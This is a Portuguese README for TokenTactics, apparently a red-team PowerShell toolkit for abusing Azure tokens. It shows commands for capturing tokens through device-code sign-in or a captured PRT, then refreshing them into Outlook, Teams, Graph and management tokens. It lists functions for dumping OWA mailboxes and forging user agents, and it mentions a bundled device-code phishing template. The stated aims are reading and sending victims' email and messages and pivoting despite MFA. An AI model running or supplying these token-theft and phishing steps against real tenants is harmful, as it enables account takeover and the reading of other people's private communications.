
Conjunto de Ferramentas de Manipulação de Tokens JWT do Azure
Conjunto de ferramentas de manipulação de Azure JSON Web Token ("JWT")
Os tokens de acesso do Azure permitem autenticar em determinados endpoints como um utilizador que inicia sessão com um código de dispositivo, mesmo que tenha utilizado autenticação multifator. Assim que tiver o token de acesso de um utilizador, pode ser possível aceder a determinadas aplicações como Outlook, SharePoint, OneDrive, MSTeams e muito mais.
Por exemplo, se tiver um token Graph ou MSGraph, pode conectar-se ao Azure e extrair utilizadores, grupos, etc. Dependendo das políticas de acesso condicional, pode trocar para um token Azure Core Management e executar AzureHound. Depois, trocar para um token Outlook e ler/enviar e-mails, ou para o MS Teams e ler/enviar mensagens!
Para mais informações sobre tipos de tokens do Azure: Microsoft identity platform access tokens
Existem alguns exemplos de pedidos a endpoints na pasta resources. Há também um modelo de phishing de exemplo para phishing com código de dispositivo.
Pode também usar estes tokens com AAD Internals. Recomendamos fortemente que veja esta ferramenta incrível.
Import-Module .\TokenTactics.psd1
Get-Help Get-AzureToken
Invoke-RefreshToSubstrateToken
Get-AzureToken -Client MSGraph
Depois de o utilizador iniciar sessão, será apresentado o JWT e este será guardado na variável $response. Para aceder ao token de acesso, use $response.access_token a partir da sua janela PowerShell para exibir o token. Também pode exibir o token de atualização com $response.refresh_token. Dica: vai querer o token de atualização para continuar a renovar novos tokens de acesso! Por predefinição, os resultados do Get-AzureToken são registados em TokenLog.log.
Get-AzureToken -Client DODMSGraph
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
Connect-AzureAD -AadAccessToken $response.access_token -AccountId [email protected]
Assim que um PRT for capturado, autentique com roadrecon para obter o seu access_token e refresh_token. Ao atualizar com TokenTactics, use o ClientID 1b730954-1685-4b74-9bfd-dac224a7b894.
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
Invoke-ClearToken -Token All
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-ClearToken 0.0.2 TokenTactics
Function Invoke-DumpOWAMailboxViaMSGraphApi 0.0.2 TokenTactics
Function Invoke-ForgeUserAgent 0.0.2 TokenTactics
Function Get-AzureToken 0.0.2 TokenTactics
Function Get-TenantID 0.0.2 TokenTactics
Function Invoke-OpenOWAMailboxInBrowser 0.0.2 TokenTactics
Function Invoke-ParseJWTtoken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureCoreManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToDODMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMAMToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSManageToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSTeamsToken 0.0.2 TokenTactics
Function Invoke-RefreshToO365SuiteUXToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeAppsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToOutlookToken 0.0.2 TokenTactics
Function Invoke-RefreshToSubstrateToken 0.0.2 TokenTactics
Function Invoke-RefreshToYammerToken 0.0.2 TokenTactics
Os métodos do TokenTactics são fortemente influenciados pela excelente investigação do Dr. Nestori Syynimaa em https://o365blog.com/.